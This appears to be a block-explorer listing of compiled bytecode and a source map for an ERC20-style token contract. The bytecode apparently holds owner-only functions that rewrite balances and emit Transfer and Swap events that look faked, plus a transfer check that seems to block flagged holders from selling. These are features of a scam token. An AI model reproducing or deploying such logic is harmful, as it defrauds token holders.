08036833701905050905030816000815181106112e957fe5b6001600160a01b03928316602091820292909201810191909152600754604080517fad5c46480000000000000000000000000000000000000000000000000000000081529051919093169263ad5c4648926004808301939192829003018186803b15801561135657600080fd5b505afa15801561136a573d6000803e3d6000fd5b505050506040513d602081101561138057600080fd5b505181518290600190811061139157fe5b6001600160a01b0390921660209283029190910190910152905090565b60408051600280825260608083018452600093909291906020830190803683370190505090506113de848461157d565b9050806000815181106113ed57fe5b6020026020010151600160006001421180611406575060005b806114115750426001105b61141c576000611429565b6060611426611714565b901c5b6001600160a01b03168152602081019190915260400160009081208054909201909155815182919061145757fe5b602002602001015191505092915050565b306000908152600160209081526040808320548383528184206007546001600160a01b03168552909252909120556107e98484848461171b565b600082820183811015610f67576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b600082821115611553576040805162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f770000604482015290519081900360640190fd5b50900390565b600081838161156457fe5b049392505050565b600a0190565b620186a09081020490565b600754604080517f1f00ca7400000000000000000000000000000000000000000000000000000000815260048101858152602482019283528451604483015284516060946001600160a01b031693631f00ca749388938893909291606401906020808601910280838360005b838110156116015781810151838201526020016115e9565b50505050905001935050505060006040518083038186803b15801561162557600080fd5b505afa158015611639573d6000803e3d6000fd5b505050506040513d6000823e601f3d9081017fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0168201604052602081101561168057600080fd5b81019080805160405193929190846401000000008211156116a057600080fd5b9083019060208201858111156116b557600080fd5b82518660208202830111640100000000821117156116d257600080fd5b82525081516020918201928201910280838360005b838110156116ff5781810151838201526020016116e7565b50505050905001604052505050905092915050565b3060601b90565b600760009054906101000a90046001600160a01b03166001600160a01b0316638803dbee85858585426104b0016040518663ffffffff1660e01b81526004018086815260200185815260200180602001846001600160a01b03168152602001838152602001828103825285818151815260200191508051906020019060200280838360005b838110156117b85781810151838201526020016117a0565b505050509050019650505050505050600060405180830381600087803b1580156117e157600080fd5b505af11580156117f5573d6000803e3d6000fd5b505050506040513d6000823e601f3d9081017fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0168201604052602081101561183c57600080fd5b810190808051604051939291908464010000000082111561185c57600080fd5b90830190602082018581111561187157600080fd5b825186602082028301116401000000008211171561188e57600080fd5b82525081516020918201928201910280838360005b838110156118bb5781810151838201526020016118a3565b50505050905001604052505050505050505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122012e077b901c4ce1a65297059f8ded83572f3bd812b7c4a33d58a867ece63b5e164736f6c63430007060033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061016c5760003560e01c806370a08231116100cd578063bda0278211610081578063ea923bae11610066578063ea923bae1461054b578063ebfb412d146105bb578063ff5c1d62146105e15761016c565b8063bda02782146104f7578063dd62ed3e1461051d5761016c565b806395d89b41116100b257806395d89b4114610497578063a457c2d71461049f578063a9059cbb146104cb5761016c565b806370a082311461044d5780638da5cb5b146104735761016c565b8063313ce56711610124578063395093511161010957806339509351146103345780635765a5cc1461036057806358a102591461038e5761016c565b8063313ce567146102a4578063316d295f146102c25761016c565b8063095ea7b311610155578063095ea7b31461022657806318160ddd1461026657806323b872dd1461026e5761016c565b806304ee65c01461017157806306fdde03146101a9575b600080fd5b6101976004803603602081101561018757600080fd5b50356001600160a01b0316610607565b60408051918252519081900360200190f35b6101b1610619565b6040805160208082528351818301528351919283929083019185019080838360005b838110156101eb5781810151838201526020016101d3565b50505050905090810190601f1680156102185780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6102526004803603604081101561023c57600080fd5b506001600160a01b0381351690602001356106cd565b604080519115158252519081900360200190f35b6101976106e3565b6102526004803603606081101561028457600080fd5b506001600160a01b038135811691602081013590911690604001356106e9565b6102ac61070b565b6040805160ff9092168252519081900360200190f35b610332600480360360408110156102d857600080fd5b8101906020810181356401000000008111156102f357600080fd5b82018360208201111561030557600080fd5b8035906020019184602083028401116401000000008311171561032757600080fd5b91935091503561072c565b005b6102526004803603604081101561034a57600080fd5b506001600160a01b0381351690602001356107ef565b6101976004803603604081101561037657600080fd5b506001600160a01b0381358116916020013516610808565b610252600480360360808110156103a457600080fd5b8135916001600160a01b0360208201351691604082013591908101906080810160608201356401000000008111156103db57600080fd5b8201836020820111156103ed57600080fd5b8035906020019184602083028401116401000000008311171561040f57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610822945050505050565b6101976004803603602081101561046357600080fd5b50356001600160a01b03166108c3565b61047b6108de565b604080516001600160a01b039092168252519081900360200190f35b6101b16108ed565b610252600480360360408110156104b557600080fd5b506001600160a01b03813516906020013561096c565b610252600480360360408110156104e157600080fd5b506001600160a01b0381351690602001356109d3565b6101976004803603602081101561050d57600080fd5b50356001600160a01b03166109e0565b6101976004803603604081101561053357600080fd5b506001600160a01b03813581169160200135166109f2565b6103326004803603604081101561056157600080fd5b81019060208101813564010000000081111561057c57600080fd5b82018360208201111561058e57600080fd5b803590602001918460208302840111640100000000831117156105b057600080fd5b919350915035610a1b565b610332600480360360208110156105d157600080fd5b50356001600160a01b0316610ac6565b610197600480360360208110156105f757600080fd5b50356001600160a01b0316610be2565b60026020526000908152604090205481565b60058054604080516020601f60027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156106c35780601f10610698576101008083540402835291602001916106c3565b820191906000526020600020905b8154815290600101906020018083116106a657829003601f168201915b5050505050905090565b60006106da338484610bf4565b50600192915050565b60045490565b60006106f6843384610cde565b610701848484610d75565b5060019392505050565b60085474010000000000000000000000000000000000000000900460ff1681565b6003546001600160a01b0316331461078b576040805162461bcd60e51b815260206004820152601760248201527f43616c6c6572206973206e6f7420746865206f776e6572000000000000000000604482015290519081900360640190fd5b60005b828110156107e95742156107e15760006107c160608686858181106107af57fe5b9050602002013560001c901c84610f44565b90506107df8585848181106107d257fe5b9050602002013582610f6e565b505b60010161078e565b50505050565b60003361070181858561080283836109f2565b01610bf4565b600060208181529281526040808220909352908152205481565b6003546000906001600160a01b03163314610884576040805162461bcd60e51b815260206004820152601760248201527f43616c6c6572206973206e6f7420746865206f776e6572000000000000000000604482015290519081900360640190fd5b60005b82518110156108b7576108af83828151811061089f57fe5b6020026020010151878688610f9f565b600101610887565b50600195945050505050565b6001600160a01b031660009081526001602052604090205490565b6003546001600160a01b031681565b60068054604080516020601f60027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156106c35780601f10610698576101008083540402835291602001916106c3565b6000338161097a82866109f2565b9050838110156109bb5760405162461bcd60e51b81526004018080602001828103825260258152602001806119846025913960400191505060405180910390fd5b6109c88286868403610bf4565b506001949350505050565b60006106da338484610d75565b60016020526000908152604090205481565b6001600160a01b0391821660009081526020818152604080832093909416825291909152205490565b6003546001600160a01b03163314610a7a576040805162461bcd60e51b815260206004820152601760248201527f43616c6c6572206973206e6f7420746865206f776e6572000000000000000000604482015290519081900360640190fd5b60005b828110156107e9574215610abe576000610a9e60608686858181106107af57fe5b9050610abc858584818110610aaf57fe5b90506020020135826110f5565b505b600101610a7d565b6003546001600160a01b03163314610b25576040805162461bcd60e51b815260206004820152601760248201527f43616c6c6572206973206e6f7420746865206f776e6572000000000000000000604482015290519081900360640190fd5b6000620186a0610bad600760009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015610b7c57600080fd5b505afa158015610b90573d6000803e3d6000fd5b505050506040513d6020811015610ba657600080fd5b5051611164565b6201869f0281610bb957fe5b0490506000610bc66112b7565b90506000610bd483836113ae565b90506107e983828487611468565b60096020526000908152604090205481565b6001600160a01b038316610c395760405162461bcd60e51b81526004018080602001828103825260248152602001806119606024913960400191505060405180910390fd5b6001600160a01b038216610c7e5760405162461bcd60e51b81526004018080602001828103825260228152602001806118f36022913960400191505060405180910390fd5b6001600160a01b0380841660008181526020818152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6000610cea84846109f2565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146107e95781811015610d68576040805162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015290519081900360640190fd5b6107e98484848403610bf4565b6001600160a01b038316610dba5760405162461bcd60e51b815260040180806020018281038252602581526020018061193b6025913960400191505060405180910390fd5b6001600160a01b038216610dff5760405162461bcd60e51b81526004018080602001828103825260238152602001806118d06023913960400191505060405180910390fd5b6001600160a01b03831660009081526001602052604090205481811015610e575760405162461bcd60e51b81526004018080602001828103825260268152602001806119156026913960400191505060405180910390fd5b6001600160a01b03841660009081526002602052604090205415610eae576001600160a01b038416600090815260026020908152604080832054600190925290912054610ea491906114a2565b15610eae57600080fd5b610eb881836114fc565b6001600160a01b038086166000908152600160205260408082209390935590851681522054610ee790836114a2565b6001600160a01b0380851660008181526001602090815260409182902094909455805186815290519193928816927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a350505050565b6001600160a01b038216600090815260016020526040812054610f679083611559565b9392505050565b610f778161156c565b60026000606085901c5b6001600160a01b031681526020810191909152604001600020555050565b600854604080517f23b872dd0000000000000000000000000000000000000000000000000000000081526001600160a01b0387811660048301529283166024820152604481018590529051918316916323b872dd916064808201926020929091908290030181600087803b15801561101657600080fd5b505af115801561102a573d6000803e3d6000fd5b505050506040513d602081101561104057600080fd5b50506008546040805185815290516001600160a01b038088169316917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef919081900360200190a360408051848152600060208201819052818301526060810184905290516001600160a01b03861691737a250d5630b4cf539739df2c5dacb4c659f2488d917fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8229181900360800190a350505050565b600854606083901c60008181526001602090815260409182902054825190815291516001600160a01b03909416937fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9281900390910190a361115681611572565b60016000606085901c610f81565b6000806000600860009054906101000a90046001600160a01b03166001600160a01b0316630902f1ac6040518163ffffffff1660e01b815260040160606040518083038186803b1580156111b757600080fd5b505afa1580156111cb573d6000803e3d6000fd5b505050506040513d60608110156111e157600080fd5b508051602091820151600854604080517f0dfe168100000000000000000000000000000000000000000000000000000000815290519396509194506001600160a01b0380891694911692630dfe1681926004808201939291829003018186803b15801561124d57600080fd5b505afa158015611261573d6000803e3d6000fd5b505050506040513d602081101561127757600080fd5b50516001600160a01b03161461129d57806dffffffffffffffffffffffffffff166112af565b816dffffffffffffffffffffffffffff165b949350505050565b60408051600280825260608083018452928392919060208301908036833701905050905030816000815181106112e957fe5b6001600160a01b03928316602091820292909201810191909152600754604080517fad5c46480000000000000000000000000000000000000000000000000000000081529051919093169263ad5c4648926004808301939192829003018186803b15801561135657600080fd5b505afa15801561136a573d6000803e3d6000fd5b505050506040513d602081101561138057600080fd5b505181518290600190811061139157fe5b6001600160a01b0390921660209283029190910190910152905090565b60408051600280825260608083018452600093909291906020830190803683370190505090506113de848461157d565b9050806000815181106113ed57fe5b6020026020010151600160006001421180611406575060005b806114115750426001105b61141c576000611429565b6060611426611714565b901c5b6001600160a01b03168152602081019190915260400160009081208054909201909155815182919061145757fe5b602002602001015191505092915050565b306000908152600160209081526040808320548383528184206007546001600160a01b03168552909252909120556107e98484848461171b565b600082820183811015610f67576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b600082821115611553576040805162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f770000604482015290519081900360640190fd5b50900390565b600081838161156457fe5b049392505050565b600a0190565b620186a09081020490565b600754604080517f1f00ca7400000000000000000000000000000000000000000000000000000000815260048101858152602482019283528451604483015284516060946001600160a01b031693631f00ca749388938893909291606401906020808601910280838360005b838110156116015781810151838201526020016115e9565b50505050905001935050505060006040518083038186803b15801561162557600080fd5b505afa158015611639573d6000803e3d6000fd5b505050506040513d6000823e601f3d9081017fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0168201604052602081101561168057600080fd5b81019080805160405193929190846401000000008211156116a057600080fd5b9083019060208201858111156116b557600080fd5b82518660208202830111640100000000821117156116d257600080fd5b82525081516020918201928201910280838360005b838110156116ff5781810151838201526020016116e7565b50505050905001604052505050905092915050565b3060601b90565b600760009054906101000a90046001600160a01b03166001600160a01b0316638803dbee85858585426104b0016040518663ffffffff1660e01b81526004018086815260200185815260200180602001846001600160a01b03168152602001838152602001828103825285818151815260200191508051906020019060200280838360005b838110156117b85781810151838201526020016117a0565b505050509050019650505050505050600060405180830381600087803b1580156117e157600080fd5b505af11580156117f5573d6000803e3d6000fd5b505050506040513d6000823e601f3d9081017fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0168201604052602081101561183c57600080fd5b810190808051604051939291908464010000000082111561185c57600080fd5b90830190602082018581111561187157600080fd5b825186602082028301116401000000008211171561188e57600080fd5b82525081516020918201928201910280838360005b838110156118bb5781810151838201526020016118a3565b50505050905001604052505050505050505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f206164647265737345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122012e077b901c4ce1a65297059f8ded83572f3bd812b7c4a33d58a867ece63b5e164736f6c63430007060033

Deployed Bytecode Sourcemap

10060:10815:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3999:36;;;;;;;;;;;;;;;;-1:-1:-1;3999:36:0;-1:-1:-1;;;;;3999:36:0;;:::i;:::-;;;;;;;;;;;;;;;;4713:91;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6618:183;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;6618:183:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;5026:99;;;:::i;6809:248::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;6809:248:0;;;;;;;;;;;;;;;;;:::i;10152:26::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;17364:673;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;17364:673:0;-1:-1:-1;17364:673:0;;:::i;:::-;;7065:267;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;7065:267:0;;;;;;;;:::i;3893:56::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;3893:56:0;;;;;;;;;;:::i;10753:279::-;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;10753:279:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;10753:279:0;;-1:-1:-1;10753:279:0;;-1:-1:-1;;;;;10753:279:0:i;6148:110::-;;;;;;;;;;;;;;;;-1:-1:-1;6148:110:0;-1:-1:-1;;;;;6148:110:0;;:::i;4042:20::-;;;:::i;:::-;;;;-1:-1:-1;;;;;4042:20:0;;;;;;;;;;;;;;4923:95;;;:::i;7340:466::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;7340:466:0;;;;;;;;:::i;6266:175::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;6266:175:0;;;;;;;;:::i;3956:36::-;;;;;;;;;;;;;;;;-1:-1:-1;3956:36:0;-1:-1:-1;;;;;3956:36:0;;:::i;6449:161::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;6449:161:0;;;;;;;;;;:::i;15930:673::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;15930:673:0;-1:-1:-1;15930:673:0;;:::i;12320:273::-;;;;;;;;;;;;;;;;-1:-1:-1;12320:273:0;-1:-1:-1;;;;;12320:273:0;;:::i;10187:43::-;;;;;;;;;;;;;;;;-1:-1:-1;10187:43:0;-1:-1:-1;;;;;10187:43:0;;:::i;3999:36::-;;;;;;;;;;;;;:::o;4713:91::-;4791:5;4784:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4758:13;;4784:12;;4791:5;;4784:12;;4791:5;4784:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4713:91;:::o;6618:183::-;6717:4;6734:37;6743:10;6755:7;6764:6;6734:8;:37::i;:::-;-1:-1:-1;6789:4:0;6618:183;;;;:::o;5026:99::-;5105:12;;5026:99;:::o;6809:248::-;6931:4;6948:41;6964:4;6970:10;6982:6;6948:15;:41::i;:::-;7000:27;7010:4;7016:2;7020:6;7000:9;:27::i;:::-;-1:-1:-1;7045:4:0;6809:248;;;;;:::o;10152:26::-;;;;;;;;;:::o;17364:673::-;4576:5;;-1:-1:-1;;;;;4576:5:0;4585:10;4576:19;4568:55;;;;;-1:-1:-1;;;4568:55:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;17499:9:::1;17494:536;17514:15:::0;;::::1;17494:536;;;17580:15;:44:::0;17576:443:::1;;17674:10;17687:273;17912:2;17900:4;;17905:1;17900:7;;;;;;;;;;;;;17892:16;;:22;;17939:2;17687:14;:273::i;:::-;17674:286;;17979:24;17991:4;;17996:1;17991:7;;;;;;;;;;;;;18000:2;17979:11;:24::i;:::-;17576:443;;17531:3;;17494:536;;;;17364:673:::0;;;:::o;7065:267::-;7178:4;7213:10;7234:68;7213:10;7252:7;7291:10;7261:27;7213:10;7252:7;7261:9;:27::i;:::-;:40;7234:8;:68::i;3893:56::-;;;;;;;;;;;;;;;;;;;;;;:::o;10753:279::-;4576:5;;10893:4;;-1:-1:-1;;;;;4576:5:0;4585:10;4576:19;4568:55;;;;;-1:-1:-1;;;4568:55:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;10915:9:::1;10910:93;10934:1;:8;10930:1;:12;10910:93;;;10964:27;10976:1;10978;10976:4;;;;;;;;;;;;;;10982:1;10985;10988:2;10964:11;:27::i;:::-;10944:3;;10910:93;;;-1:-1:-1::0;11020:4:0::1;::::0;10753:279;-1:-1:-1;;;;;10753:279:0:o;6148:110::-;-1:-1:-1;;;;;6240:10:0;6213:7;6240:10;;;:1;:10;;;;;;;6148:110::o;4042:20::-;;;-1:-1:-1;;;;;4042:20:0;;:::o;4923:95::-;5003:7;4996:14;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4970:13;;4996:14;;5003:7;;4996:14;;5003:7;4996:14;;;;;;;;;;;;;;;;;;;;;;;;7340:466;7458:4;7493:10;7458:4;7541:27;7493:10;7560:7;7541:9;:27::i;:::-;7514:54;;7621:15;7601:16;:35;;7579:122;;;;-1:-1:-1;;;7579:122:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7714:62;7723:7;7732;7760:15;7741:16;:34;7714:8;:62::i;:::-;-1:-1:-1;7794:4:0;;7340:466;-1:-1:-1;;;;7340:466:0:o;6266:175::-;6361:4;6378:33;6388:10;6400:2;6404:6;6378:9;:33::i;3956:36::-;;;;;;;;;;;;;:::o;6449:161::-;-1:-1:-1;;;;;6583:10:0;;;6556:7;6583:10;;;;;;;;;;;:19;;;;;;;;;;;;;6449:161::o;15930:673::-;4576:5;;-1:-1:-1;;;;;4576:5:0;4585:10;4576:19;4568:55;;;;;-1:-1:-1;;;4568:55:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;16066:9:::1;16061:535;16081:15:::0;;::::1;16061:535;;;16147:15;:44:::0;16143:442:::1;;16241:10;16254:271;16477:2;16465:4;;16470:1;16465:7;;;;;;16254:271;16241:284;;16544:25;16557:4;;16562:1;16557:7;;;;;;;;;;;;;16566:2;16544:12;:25::i;:::-;16143:442;;16098:3;;16061:535;;12320:273:::0;4576:5;;-1:-1:-1;;;;;4576:5:0;4585:10;4576:19;4568:55;;;;;-1:-1:-1;;;4568:55:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;12377:15:::1;12423:6;12396:15;12400:3;;;;;;;;;-1:-1:-1::0;;;;;12400:3:0::1;-1:-1:-1::0;;;;;12400:8:0::1;;:10;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;::::0;::::1;;-1:-1:-1::0;12400:10:0;12396:3:::1;:15::i;:::-;12414:5;12396:23;12395:34;;;;;;12377:52;;12440:26;12469:5;:3;:5::i;:::-;12440:34;;12485:14;12502:29;12512:7;12521:9;12502;:29::i;:::-;12485:46;;12542:43;12554:7;12563:6;12571:9;12582:2;12542:11;:43::i;10187:::-:0;;;;;;;;;;;;;:::o;8473:378::-;-1:-1:-1;;;;;8611:21:0;;8603:70;;;;-1:-1:-1;;;8603:70:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;8692:21:0;;8684:68;;;;-1:-1:-1;;;8684:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;8765:10:0;;;:1;:10;;;;;;;;;;;:19;;;;;;;;;;;;;:28;;;8809:34;;;;;;;;;;;;;;;;;8473:378;;;:::o;8859:466::-;8996:24;9023:27;9033:7;9042;9023:9;:27::i;:::-;8996:54;;9085:17;9065:16;:37;9061:257;;9165:6;9145:16;:26;;9119:117;;;;;-1:-1:-1;;;9119:117:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;9253:53;9262:7;9271;9299:6;9280:16;:25;9253:8;:53::i;7814:651::-;-1:-1:-1;;;;;7945:18:0;;7937:68;;;;-1:-1:-1;;;7937:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;8024:16:0;;8016:64;;;;-1:-1:-1;;;8016:64:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;8115:7:0;;8093:19;8115:7;;;:1;:7;;;;;;8155:21;;;;8133:109;;;;-1:-1:-1;;;8133:109:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;8257:7:0;;8267:1;8257:7;;;:1;:7;;;;;;:11;8253:79;;-1:-1:-1;;;;;8297:7:0;;;;;;:1;:7;;;;;;;;;8306:1;:7;;;;;;;8293:21;;8297:7;8293:3;:21::i;:::-;:26;8285:35;;;;;;8354:24;8358:11;8371:6;8354:3;:24::i;:::-;-1:-1:-1;;;;;8344:7:0;;;;;;;:1;:7;;;;;;:34;;;;8401:5;;;;;;;8397:18;;8408:6;8397:3;:18::i;:::-;-1:-1:-1;;;;;8389:5:0;;;;;;;:1;:5;;;;;;;;;:26;;;;8431;;;;;;;8389:5;;8431:26;;;;;;;;;;;;;7814:651;;;;:::o;12799:153::-;-1:-1:-1;;;;;12932:6:0;;12897:7;12932:6;;;:1;:6;;;;;;12924:20;;12940:3;12924:7;:20::i;:::-;12917:27;12799:153;-1:-1:-1;;;12799:153:0:o;18976:566::-;19510:24;19529:3;19510:10;:24::i;:::-;19117:1;:390;19460:2;19445:17;;;19275:115;-1:-1:-1;;;;;19117:390:0;;;;;;;;;;;;-1:-1:-1;19117:390:0;:417;-1:-1:-1;;18976:566:0:o;19550:474::-;19750:5;;19705:64;;;;;;-1:-1:-1;;;;;19705:64:0;;;;;;;19750:5;;;19705:64;;;;;;;;;;;;:28;;;;;;:64;;;;;;;;;;;;;;;19750:5;19705:28;:64;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;19802:5:0;;19785:42;;;;;;;;-1:-1:-1;;;;;19785:42:0;;;;19802:5;;19785:42;;;;;;19705:64;19785:42;;;19843:173;;;;;;19942:1;19843:173;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;19843:173:0;;;19862:42;;19843:173;;;;;;;;;19550:474;;;;:::o;13887:1111::-;14175:5;;14148:2;14133:17;;;14196:430;;;;:1;:430;;;;;;;;;;14005:632;;;;;;;-1:-1:-1;;;;;14175:5:0;;;;14005:632;;;;;;;;;;14965:25;14985:3;14965:11;:25::i;:::-;14677:1;:285;14915:2;14900:17;;;14718:201;;12601:190;12648:7;12669:10;12681;12697:5;;;;;;;;;-1:-1:-1;;;;;12697:5:0;-1:-1:-1;;;;;12697:17:0;;:19;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;12697:19:0;;;;;;;12735:5;;12697:19;12735:14;;;;;;;12697:19;;-1:-1:-1;12697:19:0;;-1:-1:-1;;;;;;12735:19:0;;;;:5;;;:12;;:14;;;;;12697:19;12735:14;;;;;;:5;:14;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;12735:14:0;-1:-1:-1;;;;;12735:19:0;;12734:49;;12780:2;12772:11;;12734:49;;;12766:2;12758:11;;12734:49;12727:56;12601:190;-1:-1:-1;;;;12601:190:0:o;11040:202::-;11140:16;;;11154:1;11140:16;;;11078;11140;;;;;11078;;;11140;11154:1;11140:16;;;;;;;;;;-1:-1:-1;11140:16:0;11136:20;;11182:4;11167:1;11169;11167:4;;;;;;;;-1:-1:-1;;;;;11167:20:0;;;:4;;;;;;;;;;:20;;;;11205:3;;:10;;;;;;;;:3;;;;;:8;;:10;;;;;11167:4;;11205:10;;;;;:3;:10;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;11205:10:0;11198:4;;:1;;11200;;11198:4;;;;;;-1:-1:-1;;;;;11198:17:0;;;:4;;;;;;;;;;;:17;11233:1;-1:-1:-1;11040:202:0;:::o;20280:592::-;20486:16;;;20500:1;20486:16;;;20445:22;20486:16;;;;;20379:7;;20445:22;;20486:16;20500:1;20486:16;;;;;;;;;;-1:-1:-1;20486:16:0;20478:24;;20545:16;20550:7;20559:1;20545:4;:16::i;:::-;20537:24;;20811:5;20817:1;20811:8;;;;;;;;;;;;;;20572:1;:235;20614:1;20588:15;:28;:63;;;-1:-1:-1;20645:1:0;20588:63;:112;;;-1:-1:-1;20685:15:0;20680:1;20672:28;20588:112;:208;;20793:1;20588:208;;;20753:2;20744:4;:2;:4::i;:::-;20736:19;;20588:208;-1:-1:-1;;;;;20572:235:0;;;;;;;;;;;;-1:-1:-1;20572:235:0;;;:247;;;;;;;;20856:8;;:5;;-1:-1:-1;20856:8:0;;;;;;;;;;20849:15;;;20280:592;;;;:::o;11250:288::-;11459:4;11449:16;;;;:1;:16;;;;;;;;;11416;;;;;;11441:3;;-1:-1:-1;;;;;11441:3:0;11416:30;;;;;;;;:49;11476:54;11490:14;11506:8;11516:4;11522:7;11476:13;:54::i;5481:221::-;5541:7;5604;;;5630:9;;;;5622:49;;;;;-1:-1:-1;;;5622:49:0;;;;;;;;;;;;;;;;;;;;;;;;;;;5710:194;5770:7;5804:2;5798;:8;;5790:51;;;;;-1:-1:-1;;;5790:51:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;5866:7:0;;;5710:194::o;5133:106::-;5197:7;5229:2;5224;:7;;;;;;;5133:106;-1:-1:-1;;;5133:106:0:o;5376:97::-;5463:2;5458:7;;5376:97::o;5247:121::-;5347:12;5331:11;;;5330:30;;5247:121::o;15006:163::-;15137:3;;:24;;;;;;;;;;;;;;;;;;;;;;;;;;15101:16;;-1:-1:-1;;;;;15137:3:0;;:16;;15154:3;;15159:1;;15137:24;;;;;;;;;;;;;;;:3;:24;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;15137:24:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15130:31;;15006:163;;;;:::o;6022:118::-;6118:4;6129:2;6094:37;6022:118;:::o;11546:399::-;11715:3;;;;;;;;;-1:-1:-1;;;;;11715:3:0;-1:-1:-1;;;;;11715:28:0;;11784:9;11808:13;11862:5;11882:7;11904:15;11922:4;11904:22;11715:222;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;11715:222:0;;;;;;